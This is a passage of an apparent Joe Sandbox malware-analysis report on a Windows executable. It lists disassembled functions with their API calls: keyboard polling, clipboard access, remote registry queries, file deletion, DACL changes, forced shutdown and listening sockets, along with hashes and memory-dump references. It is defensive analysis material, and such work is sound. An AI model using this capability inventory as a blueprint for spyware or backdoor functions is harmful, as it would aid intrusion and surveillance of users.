CloseHandle.KERNEL32(00000000), ref: 00CCA341

Strings

\, xrefs: 00CCA247
:, xrefs: 00CCA252
\??\%s, xrefs: 00CCA22B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: a36b693b03bca9def71d8a1b6545c6e150c9c0836496b5ca5149865a3ba36199
Instruction ID: d4bc7c251d606419444b1c1933e7924592976882d5e9863fb610363a4640457b
Opcode Fuzzy Hash: a36b693b03bca9def71d8a1b6545c6e150c9c0836496b5ca5149865a3ba36199
Instruction Fuzzy Hash: 6B31A071900159ABDB21DFA0DC89FEF37BCAF88704F1440BAFA08D6160EB7097458B25

Function 00CB7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CB821E
Part of subcall function 00CB8202: GetLastError.KERNEL32(?,00CB7CE2,?,?,?), ref: 00CB8228
Part of subcall function 00CB8202: GetProcessHeap.KERNEL32(00000008,?,?,00CB7CE2,?,?,?), ref: 00CB8237
Part of subcall function 00CB8202: HeapAlloc.KERNEL32(00000000,?,00CB7CE2,?,?,?), ref: 00CB823E
Part of subcall function 00CB8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CB8255

Part of subcall function 00CB829F: GetProcessHeap.KERNEL32(00000008,00CB7CF8,00000000,00000000,?,00CB7CF8,?), ref: 00CB82AB
Part of subcall function 00CB829F: HeapAlloc.KERNEL32(00000000,?,00CB7CF8,?), ref: 00CB82B2
Part of subcall function 00CB829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CB7CF8,?), ref: 00CB82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CB7D13
_memset.LIBCMT ref: 00CB7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CB7D47
GetLengthSid.ADVAPI32(?), ref: 00CB7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00CB7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CB7DB1
GetLengthSid.ADVAPI32(?), ref: 00CB7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CB7DDD
HeapAlloc.KERNEL32(00000000), ref: 00CB7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CB7E05
CopySid.ADVAPI32(00000000), ref: 00CB7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CB7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CB7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CB7E77

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 91d3cd30b826d8071bf6b5316fb18bdffd82d54cf1d109b7b76becd5d3b39f88
Instruction ID: a375831914332d447c19847176c1337ddde702e7a083786765879ab0d7cc1c22
Opcode Fuzzy Hash: 91d3cd30b826d8071bf6b5316fb18bdffd82d54cf1d109b7b76becd5d3b39f88
Instruction Fuzzy Hash: 5B613B71904249AFDF01DFA4DC85AEEBB79FF44301F048269F925AA291DB31DE06DB60

Function 00C766E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 00CB114F
CRLF), xrefs: 00CB12C1
ANY), xrefs: 00CB12DE
UTF16), xrefs: 00CB10CF
UTF), xrefs: 00CB10FA
BSR_UNICODE), xrefs: 00CB1338
CR), xrefs: 00CB1287
UCP), xrefs: 00CB110D
BSR_ANYCRLF), xrefs: 00CB131E
LIMIT_MATCH=, xrefs: 00CB1170
LIMIT_RECURSION=, xrefs: 00CB11FC
NO_AUTO_POSSESS), xrefs: 00CB112E
LF), xrefs: 00CB12A4
ANYCRLF), xrefs: 00CB12FB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 4b37d595f04411f40a0afe17bc2fb47134e13454cdfcff6c78f960be5ab0c825
Instruction ID: aae7afb0caf1525b08c66eaa0df232481e18117d6dd7df3190475f5a534303cf
Opcode Fuzzy Hash: 4b37d595f04411f40a0afe17bc2fb47134e13454cdfcff6c78f960be5ab0c825
Instruction Fuzzy Hash: D2728D71E00619DBDB24CF59D8907EEB7B5FF48310F54816AE919EB290EB309E81DB90

Function 00CC001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00CC0097
SetKeyboardState.USER32(?), ref: 00CC0102
GetAsyncKeyState.USER32(000000A0), ref: 00CC0122
GetKeyState.USER32(000000A0), ref: 00CC0139
GetAsyncKeyState.USER32(000000A1), ref: 00CC0168
GetKeyState.USER32(000000A1), ref: 00CC0179
GetAsyncKeyState.USER32(00000011), ref: 00CC01A5
GetKeyState.USER32(00000011), ref: 00CC01B3
GetAsyncKeyState.USER32(00000012), ref: 00CC01DC
GetKeyState.USER32(00000012), ref: 00CC01EA
GetAsyncKeyState.USER32(0000005B), ref: 00CC0213
GetKeyState.USER32(0000005B), ref: 00CC0221

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 733c2626bc37eb86385ffb8ce4067d7e9b437da8d9425ac9e1951ef9c5b7bd62
Instruction ID: 551d3ea1f857f417809a9379d431c14d07212867613222033a357918607006b9
Opcode Fuzzy Hash: 733c2626bc37eb86385ffb8ce4067d7e9b437da8d9425ac9e1951ef9c5b7bd62
Instruction Fuzzy Hash: 5551C7209047C8A9FB35DBA0C855FAABFB49F01380F1C459ED9D25A5C3DAA49B8CC761

Function 00CE03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE04AC

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CE054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CE05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CE0822
RegCloseKey.ADVAPI32(00000000), ref: 00CE082F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 27a910ee7e8f9651e2503a7a244f8e0dce5b5b7c7868027a4d7d5c8c44786298
Instruction ID: bbd211b0fb71489d2342de296cbf2146a6bf7c4f3d398f04b5e2e1e76c451c40
Opcode Fuzzy Hash: 27a910ee7e8f9651e2503a7a244f8e0dce5b5b7c7868027a4d7d5c8c44786298
Instruction Fuzzy Hash: 5FE16F71204240EFCB24DF25C891E2ABBE8FF89314F14856DF85ADB2A2D630ED45DB91

Function 00CD4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00CD418B
EmptyClipboard.USER32 ref: 00CD4191
GlobalAlloc.KERNEL32(00000002,?), ref: 00CD41A6
CloseClipboard.USER32 ref: 00CD4245

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2acf3be0837ec9af3f8ef364d99395dcc3c1d13a0325b462d7290d4bd821ef15
Instruction ID: 4f58a3ea779523ee05f11665639d168cab024e7b557b21fe52ce60a09c38dd18
Opcode Fuzzy Hash: 2acf3be0837ec9af3f8ef364d99395dcc3c1d13a0325b462d7290d4bd821ef15
Instruction Fuzzy Hash: 5621A175200210EFDB15AF64EC99B6D7BA8EF54710F10802AFA46DB3A1DB30AD02CB54

Function 00CC37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770

Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32

FindFirstFileW.KERNEL32(?,?), ref: 00CC38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CC394B
MoveFileW.KERNEL32(?,?), ref: 00CC395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CC397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00CC399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CC39B9

Strings

\*.*, xrefs: 00CC384E, 00CC3857, 00CC386C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 32ccf1ce849e7106bcb9d23af3601ab77c5e5757a6e314014a9942e93d77a081
Instruction ID: e78d369d08a426e574b3226dc1a714f7b8d97cb31b1eaa3fe6fc8fef8a1541d4
Opcode Fuzzy Hash: 32ccf1ce849e7106bcb9d23af3601ab77c5e5757a6e314014a9942e93d77a081
Instruction Fuzzy Hash: D351913180518CAACF15EBA0E992EEDB779AF10304F60816DF44677191EF316F09EB61

Function 00CCF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CCF440
Sleep.KERNEL32(0000000A), ref: 00CCF470
_wcscmp.LIBCMT ref: 00CCF484
_wcscmp.LIBCMT ref: 00CCF49F
FindNextFileW.KERNEL32(?,?), ref: 00CCF53D
FindClose.KERNEL32(00000000), ref: 00CCF553

Strings

*.*, xrefs: 00CCF425

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 813636711e390ac9a55747292416dbd2f4f1287f8f379118b0e358fc8fef1be3
Instruction ID: fcad65c847fb4e3398381e161a4bca2376b14abbe724bd62b8cb750f651ada23
Opcode Fuzzy Hash: 813636711e390ac9a55747292416dbd2f4f1287f8f379118b0e358fc8fef1be3
Instruction Fuzzy Hash: 8E416A7180024AABCF14DF64C885BEEBBB5EF04310F20456EE915A6190DB309A8ADF50

Function 00C75760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C758A5
_memmove.LIBCMT ref: 00C758F5
_memmove.LIBCMT ref: 00C7595B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d2f8a98cffd3b67f445c2d7032f812d03a6734daf466f250036a3adfedb91e96
Instruction ID: bd9b61c27865d3210b30aba74a3a43bf805e3cbc5e47d52c2014b6add3e39933
Opcode Fuzzy Hash: d2f8a98cffd3b67f445c2d7032f812d03a6734daf466f250036a3adfedb91e96
Instruction Fuzzy Hash: 9F129C70A00609EFDF14DFA5D981AEEB3F5FF48300F208529E84AE7290EB35A915DB54

Function 00CC3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770

Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32

FindFirstFileW.KERNEL32(?,?), ref: 00CC3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00CC3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00CC3BEA
FindClose.KERNEL32(00000000), ref: 00CC3C01
FindClose.KERNEL32(00000000), ref: 00CC3C0A

Strings

\*.*, xrefs: 00CC3B5B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 94f4928c58ca917582b81acf01e03ea9cab728d09d3a436ac6fd7c3225ec7310
Instruction ID: 2376fd91523eb7b03b62bf42683e74b228d6430576cc044b8e187ed82db4d7d4
Opcode Fuzzy Hash: 94f4928c58ca917582b81acf01e03ea9cab728d09d3a436ac6fd7c3225ec7310
Instruction Fuzzy Hash: 61318031008385AFC315EF24D8D1EAFB7A8AE91304F404E2DF4E596191EB21DA09DB63

Function 00CC51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
Part of subcall function 00CB87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
Part of subcall function 00CB87E1: GetLastError.KERNEL32 ref: 00CB8865

ExitWindowsEx.USER32(?,00000000), ref: 00CC51F9

Strings

@, xrefs: 00CC51EC
SeShutdownPrivilege, xrefs: 00CC51C9
, xrefs: 00CC51E7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: fb6322adbc2d09c40510b4c56efd78d931b7c3b7d8293610355a81f5a795dc2c
Instruction ID: 958800406560af33543bdf247d93f31ba3e9d45ad460d66277406c6c7fa6f52c
Opcode Fuzzy Hash: fb6322adbc2d09c40510b4c56efd78d931b7c3b7d8293610355a81f5a795dc2c
Instruction Fuzzy Hash: 5A0126317916116BF72C6268EC8AFBF72DCEB04350F24042CF923E60D2DE513D8195A0

Function 00CD6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CD62DC
WSAGetLastError.WSOCK32(00000000), ref: 00CD62EB
bind.WSOCK32(00000000,?,00000010), ref: 00CD6307
listen.WSOCK32(00000000,00000005), ref: 00CD6316
WSAGetLastError.WSOCK32(00000000), ref: 00CD6330
closesocket.WSOCK32(00000000,00000000), ref: 00CD6344

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 31a017d2451c2bb039771a9b9ed8bed6c9be4f0e891c6f28c9fac3b2e90a8bdb
Instruction ID: faeb9810e25baf56c9bc00919486db4070eefef04b41638b1fdde68811fb0190
Opcode Fuzzy Hash: 31a017d2451c2bb039771a9b9ed8bed6c9be4f0e891c6f28c9fac3b2e90a8bdb
Instruction Fuzzy Hash: 1221B1716002049FDB20EF64C885B6EB7A9EF49720F14815DFA66AB3E1C770AD05DB51

Function 00C75520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01

_memmove.LIBCMT ref: 00CB0258
_memmove.LIBCMT ref: 00CB036D
_memmove.LIBCMT ref: 00CB0414

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 7daf9d29f3d6e356d297a2c969f843ae75f4b916048e7e35a48c71da5968c6e3
Instruction ID: c37e732ae8475afbfc4fafe3d0133f2cccd8625a0112b5e858d398ad4a16fb73
Opcode Fuzzy Hash: 7daf9d29f3d6e356d297a2c969f843ae75f4b916048e7e35a48c71da5968c6e3
Instruction Fuzzy Hash: 6C02CFB0A00209EBCF04DF64D981AAEBBF5EF44300F24C469E80ADB355EB35DA55DB91

Function 00C61287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00C619FA
GetSysColor.USER32(0000000F), ref: 00C61A4E
SetBkColor.GDI32(?,00000000), ref: 00C61A61

Part of subcall function 00C61290: DefDlgProcW.USER32(?,00000020,?), ref: 00C612D8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: cc9498c6ff0308a49bce1804edc48067282caf2081194505b96eb76cb9260d32
Instruction ID: a1e19c2001b8f045705a71b3e2f4f219aae4f8cef37bf3150e4da7be7a1f6288
Opcode Fuzzy Hash: cc9498c6ff0308a49bce1804edc48067282caf2081194505b96eb76cb9260d32
Instruction Fuzzy Hash: 39A14A71116584BEEA38AB6AADC8E7F256CDF42347B1D0119FD22D6193CA249F02F271

Function 00CCBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00CCBCE6
_wcscmp.LIBCMT ref: 00CCBD16
_wcscmp.LIBCMT ref: 00CCBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00CCBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CCBD6C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: b19608c982350bb7460c78a8682ed787db322e5c2ebec698d9323f355fcc9124
Instruction ID: c2ac56c100514c637530d38f71e5139fb227a01dbef11e1a89b1c98cd7781995
Opcode Fuzzy Hash: b19608c982350bb7460c78a8682ed787db322e5c2ebec698d9323f355fcc9124
Instruction Fuzzy Hash: 9A519A75A046029FC714DFA8D4D1EAAB3E8EF49324F10461DF9668B3A1DB30EE05DB91

Function 00CD6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CD7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CD679E
WSAGetLastError.WSOCK32(00000000), ref: 00CD67C7
bind.WSOCK32(00000000,?,00000010), ref: 00CD6800
WSAGetLastError.WSOCK32(00000000), ref: 00CD680D
closesocket.WSOCK32(00000000,00000000), ref: 00CD6821

Memory Dump Source

